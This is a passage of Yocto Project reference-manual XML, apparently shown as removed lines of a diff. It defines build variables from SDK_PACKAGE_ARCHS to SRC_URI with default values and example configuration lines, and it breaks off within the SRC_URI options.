- Specifies a list of architectures compatible with
- the SDK machine.
- This variable is set automatically and should not
- normally be hand-edited.
- Entries are separated using spaces and listed in order
- of priority.
- The default value for
- <filename>SDK_PACKAGE_ARCHS</filename> is "all any noarch
- ${SDK_ARCH}-${SDKPKGSUFFIX}".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_POSTPROCESS_COMMAND'><glossterm>SDK_POSTPROCESS_COMMAND</glossterm>
- <info>
- SDK_POSTPROCESS_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system creates the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call once the
- OpenEmbedded build system creates the SDK.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- SDK_POSTPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass an SDK path to a command within a
- function, you can use
- <filename>${SDK_DIR}</filename>, which points to
- the parent directory used by the OpenEmbedded build system
- when creating SDK output.
- See the
- <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_PREFIX'><glossterm>SDK_PREFIX</glossterm>
- <info>
- SDK_PREFIX[doc] = "The toolchain binary prefix used for nativesdk recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The toolchain binary prefix used for
- <filename>nativesdk</filename> recipes.
- The OpenEmbedded build system uses the
- <filename>SDK_PREFIX</filename> value to set the
- <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>
- when building <filename>nativesdk</filename> recipes.
- The default value is "${SDK_SYS}-".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_RECRDEP_TASKS'><glossterm>SDK_RECRDEP_TASKS</glossterm>
- <info>
- SDK_RECRDEP_TASKS[doc] = "A list of shared state tasks added to the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of shared state tasks added to the extensible SDK.
- By default, the following tasks are added:
- <literallayout class='monospaced'>
- do_populate_lic
- do_package_qa
- do_populate_sysroot
- do_deploy
- </literallayout>
- Despite the default value of "" for the
- <filename>SDK_RECRDEP_TASKS</filename> variable, the
- above four tasks are always added to the SDK.
- To specify tasks beyond these four, you need to use
- the <filename>SDK_RECRDEP_TASKS</filename> variable (e.g.
- you are defining additional tasks that are needed in
- order to build
- <link linkend='var-SDK_TARGETS'><filename>SDK_TARGETS</filename></link>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_SYS'><glossterm>SDK_SYS</glossterm>
- <info>
- SDK_SYS[doc] = "Specifies the system, including the architecture and the operating system, for which the SDK will be built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the system, including the architecture and the
- operating system, for which the SDK will be built.
- </para>
-
- <para>
- The OpenEmbedded build system automatically sets this
- variable based on
- <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>,
- <link linkend='var-SDK_VENDOR'><filename>SDK_VENDOR</filename></link>,
- and
- <link linkend='var-SDK_OS'><filename>SDK_OS</filename></link>.
- You do not need to set the <filename>SDK_SYS</filename>
- variable yourself.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_TARGET_MANIFEST'><glossterm>SDK_TARGET_MANIFEST</glossterm>
- <info>
- SDK_TARGET_MANIFEST[doc] = "The manifest file for the target part of the SDK. This file lists all the installed packages that make up the target part of the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The manifest file for the target part of the SDK.
- This file lists all the installed packages that make up
- the target part of the SDK.
- The file contains package information on a line-per-package
- basis as follows:
- <literallayout class='monospaced'>
- <replaceable>packagename</replaceable> <replaceable>packagearch</replaceable> <replaceable>version</replaceable>
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class defines the manifest file as follows:
- <literallayout class='monospaced'>
- SDK_TARGET_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.target.manifest"
- </literallayout>
- The location is derived using the
- <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>
- and
- <link linkend='var-TOOLCHAIN_OUTPUTNAME'><filename>TOOLCHAIN_OUTPUTNAME</filename></link>
- variables.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_TARGETS'><glossterm>SDK_TARGETS</glossterm>
- <info>
- SDK_TARGETS[doc] = "A list of targets to install from shared state as part of the standard or extensible SDK installation."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of targets to install from shared state as part of
- the standard or extensible SDK installation.
- The default value is "${PN}" (i.e. the image from which
- the SDK is built).
- </para>
-
- <para>
- The <filename>SDK_TARGETS</filename> variable is an
- internal variable and typically would not be changed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_TITLE'><glossterm>SDK_TITLE</glossterm>
- <info>
- SDK_TITLE[doc] = "The title to be printed when running the SDK installer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The title to be printed when running the SDK installer.
- By default, this title is based on the
- <link linkend='var-DISTRO_NAME'><filename>DISTRO_NAME</filename></link>
- or
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>
- variable and is set in the
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class as follows:
- <literallayout class='monospaced'>
- SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
- </literallayout>
- For the default distribution "poky",
- <filename>SDK_TITLE</filename> is set to
- "Poky (Yocto Project Reference Distro)".
- </para>
-
- <para>
- For information on how to change this default title,
- see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-changing-the-sdk-installer-title'>Changing the Extensible SDK Installer Title</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_UPDATE_URL'><glossterm>SDK_UPDATE_URL</glossterm>
- <info>
- SDK_UPDATE_URL[doc] = "An optional URL for an update server for the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An optional URL for an update server for the extensible
- SDK.
- If set, the value is used as the default update server when
- running <filename>devtool sdk-update</filename> within the
- extensible SDK.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_VENDOR'><glossterm>SDK_VENDOR</glossterm>
- <info>
- SDK_VENDOR[doc] = "Specifies the name of the SDK vendor."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of the SDK vendor.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDK_VERSION'><glossterm>SDK_VERSION</glossterm>
- <info>
- SDK_VERSION[doc] = "Specifies the version for the SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the version of the SDK.
- The distribution configuration file (e.g.
- <filename>/meta-poky/conf/distro/poky.conf</filename>)
- defines the <filename>SDK_VERSION</filename> as follows:
- <literallayout class='monospaced'>
- SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}','snapshot')}"
- </literallayout>
- </para>
-
- <para>
- For additional information, see the
- <link linkend='var-DISTRO_VERSION'><filename>DISTRO_VERSION</filename></link>
- and
- <link linkend='var-DATE'><filename>DATE</filename></link>
- variables.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDKEXTPATH'><glossterm>SDKEXTPATH</glossterm>
- <info>
- SDKEXTPATH[doc] = "The default installation directory for the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The default installation directory for the Extensible SDK.
- By default, this directory is based on the
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>
- variable and is set in the
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
- class as follows:
- <literallayout class='monospaced'>
- SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
- </literallayout>
- For the default distribution "poky", the
- <filename>SDKEXTPATH</filename> is set to "poky_sdk".
- </para>
-
- <para>
- For information on how to change this default directory,
- see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-changing-the-default-sdk-installation-directory'>Changing the Default SDK Installation Directory</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDKIMAGE_FEATURES'><glossterm>SDKIMAGE_FEATURES</glossterm>
- <info>
- SDKIMAGE_FEATURES[doc] = "Equivalent to IMAGE_FEATURES. However, this variable applies to the SDK generated from an image using the command 'bitbake -c populate_sdk imagename'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Equivalent to
- <filename><link linkend='var-IMAGE_FEATURES'>IMAGE_FEATURES</link></filename>.
- However, this variable applies to the SDK generated from an
- image using the following command:
- <literallayout class='monospaced'>
- $ bitbake -c populate_sdk <replaceable>imagename</replaceable>
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDKMACHINE'><glossterm>SDKMACHINE</glossterm>
- <info>
- SDKMACHINE[doc] = "Specifies the architecture (i.e. i686 or x86_64) for which to build SDK items."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The machine for which the SDK is built.
- In other words, the SDK is built such that it
- runs on the target you specify with the
- <filename>SDKMACHINE</filename> value.
- The value points to a corresponding
- <filename>.conf</filename> file under
- <filename>conf/machine-sdk/</filename>.
- </para>
-
- <para>
- You can use "i686" and "x86_64" as possible values
- for this variable. The variable defaults to "i686"
- and is set in the local.conf file in the Build Directory.
- <literallayout class='monospaced'>
- SDKMACHINE ?= "i686"
- </literallayout>
- <note>
- You cannot set the <filename>SDKMACHINE</filename>
- variable in your distribution configuration file.
- If you do, the configuration will not take affect.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDKPATH'><glossterm>SDKPATH</glossterm>
- <info>
- SDKPATH[doc] = "Defines the path offered to the user for installation of the SDK that is generated by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the path offered to the user for installation
- of the SDK that is generated by the OpenEmbedded build
- system.
- The path appears as the default location for installing
- the SDK when you run the SDK's installation script.
- You can override the offered path when you run the
- script.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SDKTARGETSYSROOT'><glossterm>SDKTARGETSYSROOT</glossterm>
- <info>
- SDKTARGETSYSROOT[doc] = "Full path to the sysroot used for cross-compilation within an SDK as it will be when installed into the default SDKPATH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The full path to the sysroot used for cross-compilation
- within an SDK as it will be when installed into the
- default
- <link linkend='var-SDKPATH'><filename>SDKPATH</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SECTION'><glossterm>SECTION</glossterm>
- <info>
- SECTION[doc] = "The section in which packages should be categorized. Package management utilities can make use of this variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The section in which packages should be categorized.
- Package management utilities can make use of this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SELECTED_OPTIMIZATION'><glossterm>SELECTED_OPTIMIZATION</glossterm>
- <info>
- SELECTED_OPTIMIZATION[doc] = "The variable takes the value of FULL_OPTIMIZATION unless DEBUG_BUILD = '1'. In this case, the value of DEBUG_OPTIMIZATION is used."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the optimization flags passed to the C compiler
- when building for the target.
- The flags are passed through the default value of the
- <link linkend='var-TARGET_CFLAGS'><filename>TARGET_CFLAGS</filename></link>
- variable.
- </para>
-
- <para>
- The <filename>SELECTED_OPTIMIZATION</filename> variable
- takes the value of
- <filename><link linkend='var-FULL_OPTIMIZATION'>FULL_OPTIMIZATION</link></filename>
- unless <filename><link linkend='var-DEBUG_BUILD'>DEBUG_BUILD</link></filename> = "1".
- If that is the case, the value of
- <filename><link linkend='var-DEBUG_OPTIMIZATION'>DEBUG_OPTIMIZATION</link></filename> is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SERIAL_CONSOLE'><glossterm>SERIAL_CONSOLE</glossterm>
- <info>
- SERIAL_CONSOLE[doc] = "Defines the serial consoles (TTYs) to enable using getty."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines a serial console (TTY) to enable using
- <ulink url='https://en.wikipedia.org/wiki/Getty_(Unix)'>getty</ulink>.
- Provide a value that specifies the baud rate followed by
- the TTY device name separated by a space.
- You cannot specify more than one TTY device:
- <literallayout class='monospaced'>
- SERIAL_CONSOLE = "115200 ttyS0"
- </literallayout>
- <note>
- The <filename>SERIAL_CONSOLE</filename> variable
- is deprecated.
- Please use the
- <link linkend='var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></link>
- variable.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SERIAL_CONSOLES'><glossterm>SERIAL_CONSOLES</glossterm>
- <info>
- SERIAL_CONSOLES[doc] = "Defines the serial consoles (TTYs) to enable using getty."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines a serial console (TTY) to enable using
- <ulink url='https://en.wikipedia.org/wiki/Getty_(Unix)'>getty</ulink>.
- Provide a value that specifies the baud rate followed by
- the TTY device name separated by a semicolon.
- Use spaces to separate multiple devices:
- <literallayout class='monospaced'>
- SERIAL_CONSOLES = "115200;ttyS0 115200;ttyS1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SERIAL_CONSOLES_CHECK'><glossterm>SERIAL_CONSOLES_CHECK</glossterm>
- <info>
- SERIAL_CONSOLES_CHECK[doc] = "Selected SERIAL_CONSOLES to check against /proc/console before enabling using getty. Supported only by SysVinit."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies serial consoles, which must be listed in
- <link linkend='var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></link>,
- to check against <filename>/proc/console</filename>
- before enabling them using getty.
- This variable allows aliasing in the format:
- &lt;device&gt;:&lt;alias&gt;.
- If a device was listed as "sclp_line0"
- in <filename>/dev/</filename> and "ttyS0" was listed
- in <filename>/proc/console</filename>, you would do the
- following:
- <literallayout class='monospaced'>
- SERIAL_CONSOLES_CHECK = "slcp_line0:ttyS0"
- </literallayout>
- This variable is currently only supported with SysVinit
- (i.e. not with systemd).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS'><glossterm>SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS</glossterm>
- <info>
- SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS[doc] = "A list of recipe dependencies that should not be used to determine signatures of tasks from one recipe when they depend on tasks from another recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of recipe dependencies that should not be used to
- determine signatures of tasks from one recipe when they
- depend on tasks from another recipe.
- For example:
- <literallayout class='monospaced'>
- SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "intone->mplayer2"
- </literallayout>
- </para>
-
- <para>
- In the previous example, <filename>intone</filename>
- depends on <filename>mplayer2</filename>.
- </para>
-
- <para>
- You can use the special token <filename>"*"</filename> on
- the left-hand side of the dependency to match all
- recipes except the one on the right-hand side.
- Here is an example:
- <literallayout class='monospaced'>
- SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "*->quilt-native"
- </literallayout>
- </para>
-
- <para>
- In the previous example, all recipes except
- <filename>quilt-native</filename> ignore task
- signatures from the <filename>quilt-native</filename>
- recipe when determining their task signatures.
- </para>
-
- <para>
- Use of this variable is one mechanism to remove dependencies
- that affect task signatures and thus force rebuilds when a
- recipe changes.
- <note><title>Caution</title>
- If you add an inappropriate dependency for a recipe
- relationship, the software might break during
- runtime if the interface of the second recipe was
- changed after the first recipe had been built.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SIGGEN_EXCLUDERECIPES_ABISAFE'><glossterm>SIGGEN_EXCLUDERECIPES_ABISAFE</glossterm>
- <info>
- SIGGEN_EXCLUDERECIPES_ABISAFE[doc] = "A list of recipes that are completely stable and will never change."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of recipes that are completely stable and will
- never change.
- The ABI for the recipes in the list are presented by
- output from the tasks run to build the recipe.
- Use of this variable is one way to remove dependencies from
- one recipe on another that affect task signatures and
- thus force rebuilds when the recipe changes.
- <note><title>Caution</title>
- If you add an inappropriate variable to this list,
- the software might break at runtime if the
- interface of the recipe was changed after the other
- had been built.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SITEINFO_BITS'><glossterm>SITEINFO_BITS</glossterm>
- <info>
- SITEINFO_BITS[doc] = "Specifies the number of bits for the target system CPU."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the number of bits for the target system CPU.
- The value should be either "32" or "64".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SITEINFO_ENDIANNESS'><glossterm>SITEINFO_ENDIANNESS</glossterm>
- <info>
- SITEINFO_ENDIANNESS[doc] = "Specifies the endian byte order of the target system. The value should be either 'le' for 'little-endian' or 'be' for 'big-endian'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the endian byte order of the target system.
- The value should be either "le" for little-endian or "be" for big-endian.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SKIP_FILEDEPS'><glossterm>SKIP_FILEDEPS</glossterm>
- <info>
- SKIP_FILEDEPS[doc] = "Enables you to remove all files from the 'Provides' section of an RPM package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Enables removal of all files from the "Provides" section of
- an RPM package.
- Removal of these files is required for packages containing
- prebuilt binaries and libraries such as
- <filename>libstdc++</filename> and
- <filename>glibc</filename>.
- </para>
-
- <para>
- To enable file removal, set the variable to "1" in your
- <filename>conf/local.conf</filename> configuration file
- in your:
- <link linkend='build-directory'>Build Directory</link>.
- <literallayout class='monospaced'>
- SKIP_FILEDEPS = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SOC_FAMILY'><glossterm>SOC_FAMILY</glossterm>
- <info>
- SOC_FAMILY[doc] = "Groups together machines based upon the same family of SOC (System On Chip). You typically set this variable in a common .inc file that you include in the configuration files of all the machines."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Groups together machines based upon the same family
- of SOC (System On Chip).
- You typically set this variable in a common
- <filename>.inc</filename> file that you include in the
- configuration files of all the machines.
- <note>
- You must include
- <filename>conf/machine/include/soc-family.inc</filename>
- for this variable to appear in
- <link linkend='var-MACHINEOVERRIDES'><filename>MACHINEOVERRIDES</filename></link>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SOLIBS'><glossterm>SOLIBS</glossterm>
- <info>
- SOLIBS[doc] = "Defines the suffix for shared libraries used on the target platform."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the suffix for shared libraries used on the
- target platform.
- By default, this suffix is ".so.*" for all Linux-based
- systems and is defined in the
- <filename>meta/conf/bitbake.conf</filename> configuration
- file.
- </para>
-
- <para>
- You will see this variable referenced in the default values
- of <filename>FILES_${PN}</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SOLIBSDEV'><glossterm>SOLIBSDEV</glossterm>
- <info>
- SOLIBSDEV[doc] = "Defines the suffix for the development symbolic link (symlink) for shared libraries on the target platform."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the suffix for the development symbolic link
- (symlink) for shared libraries on the target platform.
- By default, this suffix is ".so" for Linux-based
- systems and is defined in the
- <filename>meta/conf/bitbake.conf</filename> configuration
- file.
- </para>
-
- <para>
- You will see this variable referenced in the default values
- of <filename>FILES_${PN}-dev</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SOURCE_MIRROR_FETCH'><glossterm>SOURCE_MIRROR_FETCH</glossterm>
- <info>
- SOURCE_MIRROR_FETCH[doc] = "Set as part of a source mirror generation script to skip COMPATIBLE_MACHINE and COMPATIBLE_HOST checks."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When you are fetching files to create a mirror of sources
- (i.e. creating a source mirror), setting
- <filename>SOURCE_MIRROR_FETCH</filename> to "1" in your
- <filename>local.conf</filename> configuration file ensures
- the source for all recipes are fetched regardless of
- whether or not a recipe is compatible with the
- configuration.
- A recipe is considered incompatible with the currently
- configured machine when either or both the
- <link linkend='var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></link>
- variable and
- <link linkend='var-COMPATIBLE_HOST'><filename>COMPATIBLE_HOST</filename></link>
- variables specify compatibility with a machine other
- than that of the current machine or host.
- <note><title>Warning</title>
- Do not set the
- <filename>SOURCE_MIRROR_FETCH</filename> variable
- unless you are creating a source mirror.
- In other words, do not set the variable during a
- normal build.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SOURCE_MIRROR_URL'><glossterm>SOURCE_MIRROR_URL</glossterm>
- <info>
- SOURCE_MIRROR_URL[doc] = "URL to source mirror that will be used before fetching from original SRC_URI."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines your own
- <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- from which to first fetch source before attempting to fetch
- from the upstream specified in
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>.
- </para>
-
- <para>
- To use this variable, you must globally inherit the
- <link linkend='ref-classes-own-mirrors'><filename>own-mirrors</filename></link>
- class and then provide the URL to your mirrors.
- Here is the general syntax:
- <literallayout class='monospaced'>
- INHERIT += "own-mirrors"
- SOURCE_MIRROR_URL = "http://<replaceable>example</replaceable>.com/<replaceable>my_source_mirror</replaceable>"
- </literallayout>
- <note>
- You can specify only a single URL in
- <filename>SOURCE_MIRROR_URL</filename>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SPDXLICENSEMAP'><glossterm>SPDXLICENSEMAP</glossterm>
- <info>
- SPDXLICENSEMAP[doc] = "Maps commonly used license names to their SPDX counterparts found in meta/files/common-licenses/."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Maps commonly used license names to their SPDX counterparts
- found in <filename>meta/files/common-licenses/</filename>.
- For the default <filename>SPDXLICENSEMAP</filename>
- mappings, see the
- <filename>meta/conf/licenses.conf</filename> file.
- </para>
-
- <para>
- For additional information, see the
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SPECIAL_PKGSUFFIX'><glossterm>SPECIAL_PKGSUFFIX</glossterm>
- <info>
- SPECIAL_PKGSUFFIX[doc] = "A list of prefixes for PN used by the OpenEmbedded build system to create variants of recipes or packages. The list specifies the prefixes to strip off during certain circumstances such as the generation of the BPN variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of prefixes for <link linkend='var-PN'><filename>PN</filename></link> used by the
- OpenEmbedded build system to create variants of recipes or packages.
- The list specifies the prefixes to strip off during certain circumstances
- such as the generation of the <link linkend='var-BPN'><filename>BPN</filename></link> variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SPL_BINARY'><glossterm>SPL_BINARY</glossterm>
- <info>
- SPL_BINARY[doc] = "The file type of the Secondary Program Loader (SPL)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The file type for the Secondary Program Loader (SPL).
- Some devices use an SPL from which to boot (e.g. the
- BeagleBone development board).
- For such cases, you can declare the file type of the
- SPL binary in the <filename>u-boot.inc</filename> include
- file, which is used in the U-Boot recipe.
- </para>
-
- <para>
- The SPL file type is set to "null" by default in the
- <filename>u-boot.inc</filename> file as follows:
- <literallayout class='monospaced'>
- # Some versions of u-boot build an SPL (Second Program Loader) image that
- # should be packaged along with the u-boot binary as well as placed in the
- # deploy directory. For those versions they can set the following variables
- # to allow packaging the SPL.
- SPL_BINARY ?= ""
- SPL_BINARYNAME ?= "${@os.path.basename(d.getVar("SPL_BINARY"))}"
- SPL_IMAGE ?= "${SPL_BINARYNAME}-${MACHINE}-${PV}-${PR}"
- SPL_SYMLINK ?= "${SPL_BINARYNAME}-${MACHINE}"
- </literallayout>
- The <filename>SPL_BINARY</filename> variable helps form
- various <filename>SPL_*</filename> variables used by
- the OpenEmbedded build system.
- </para>
-
- <para>
- See the BeagleBone machine configuration example in the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a new BSP Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Board Support Package
- Developer's Guide for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SRC_URI'><glossterm>SRC_URI</glossterm>
- <info>
- SRC_URI[doc] = "The list of source files - local or remote. This variable tells the OpenEmbedded build system what bits to pull in for the build and how to pull them in."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The list of source files - local or remote.
- This variable tells the OpenEmbedded build system which bits
- to pull in for the build and how to pull them in.
- For example, if the recipe or append file only needs to
- fetch a tarball from the Internet, the recipe or
- append file uses a single <filename>SRC_URI</filename>
- entry.
- On the other hand, if the recipe or append file needs to
- fetch a tarball, apply two patches, and include a custom
- file, the recipe or append file would include four
- instances of the variable.
- </para>
-
- <para>
- The following list explains the available URI protocols.
- URI protocols are highly dependent on particular BitBake
- Fetcher submodules.
- Depending on the fetcher BitBake uses, various URL
- parameters are employed.
- For specifics on the supported Fetchers, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>Fetchers</ulink>"
- section in the BitBake User Manual.
- <itemizedlist>
- <listitem><para><emphasis><filename>file://</filename> -</emphasis>
- Fetches files, which are usually files shipped with
- the
- <link linkend='metadata'>Metadata</link>,
- from the local machine (e.g.
- <ulink url='&YOCTO_DOCS_OM_URL;#patching-dev-environment'>patch</ulink>
- files).
- The path is relative to the
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
- variable.
- Thus, the build system searches, in order, from the
- following directories, which are assumed to be a
- subdirectories of the directory in which the
- recipe file (<filename>.bb</filename>) or
- append file (<filename>.bbappend</filename>)
- resides:
- <itemizedlist>
- <listitem><para><emphasis><filename>${BPN}</filename> -</emphasis>
- The base recipe name without any special
- suffix or version numbers.
- </para></listitem>
- <listitem><para><emphasis><filename>${BP}</filename> -</emphasis>
- <filename>${<link linkend='var-BPN'>BPN</link>}-${PV}</filename>.
- The base recipe name and version but without
- any special package name suffix.
- </para></listitem>
- <listitem><para><emphasis>files -</emphasis>
- Files within a directory, which is named
- <filename>files</filename> and is also
- alongside the recipe or append file.
- </para></listitem>
- </itemizedlist>
- <note>
- If you want the build system to pick up files
- specified through a
- <filename>SRC_URI</filename>
- statement from your append file, you need to be
- sure to extend the
- <filename>FILESPATH</filename>
- variable by also using the
- <link linkend='var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></link>
- variable from within your append file.
- </note>
- </para></listitem>
- <listitem><para><emphasis><filename>bzr://</filename> -</emphasis> Fetches files from a
- Bazaar revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>git://</filename> -</emphasis> Fetches files from a
- Git revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>osc://</filename> -</emphasis> Fetches files from
- an OSC (OpenSUSE Build service) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>repo://</filename> -</emphasis> Fetches files from
- a repo (Git) repository.</para></listitem>
- <listitem><para><emphasis><filename>ccrc://</filename> -</emphasis>
- Fetches files from a ClearCase repository.
- </para></listitem>
- <listitem><para><emphasis><filename>http://</filename> -</emphasis> Fetches files from
- the Internet using <filename>http</filename>.</para></listitem>
- <listitem><para><emphasis><filename>https://</filename> -</emphasis> Fetches files
- from the Internet using <filename>https</filename>.</para></listitem>
- <listitem><para><emphasis><filename>ftp://</filename> -</emphasis> Fetches files
- from the Internet using <filename>ftp</filename>.</para></listitem>
- <listitem><para><emphasis><filename>cvs://</filename> -</emphasis> Fetches files from
- a CVS revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>hg://</filename> -</emphasis> Fetches files from
- a Mercurial (<filename>hg</filename>) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>p4://</filename> -</emphasis> Fetches files from
- a Perforce (<filename>p4</filename>) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>ssh://</filename> -</emphasis> Fetches files from
- a secure shell.</para></listitem>
- <listitem><para><emphasis><filename>svn://</filename> -</emphasis> Fetches files from
- a Subversion (<filename>svn</filename>) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>npm://</filename> -</emphasis> Fetches JavaScript
- modules from a registry.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Standard and recipe-specific options for <filename>SRC_URI</filename> exist.
- Here are standard options:
- <itemizedlist>
- <listitem><para><emphasis><filename>apply</filename> -</emphasis> Whether to apply
- the patch or not.
- The default action is to apply the patch.</para></listitem>
- <listitem><para><emphasis><filename>striplevel</filename> -</emphasis> Which
- striplevel to use when applying the patch.
- The default level is 1.</para></listitem>
- <listitem><para><emphasis><filename>patchdir</filename> -</emphasis> Specifies
- the directory in which the patch should be applied.
- The default is <filename>${</filename><link linkend='var-S'><filename>S</filename></link><filename>}</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Here are options specific to recipes building code from a revision control system:
- <itemizedlist>
- <listitem><para><emphasis><filename>mindate</filename> -</emphasis>
- Apply the patch only if
- <link linkend='var-SRCDATE'><filename>SRCDATE</filename></link>
- is equal to or greater than <filename>mindate</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>maxdate</filename> -</emphasis>
- Apply the patch only if <filename>SRCDATE</filename>
- is not later than <filename>maxdate</filename>.
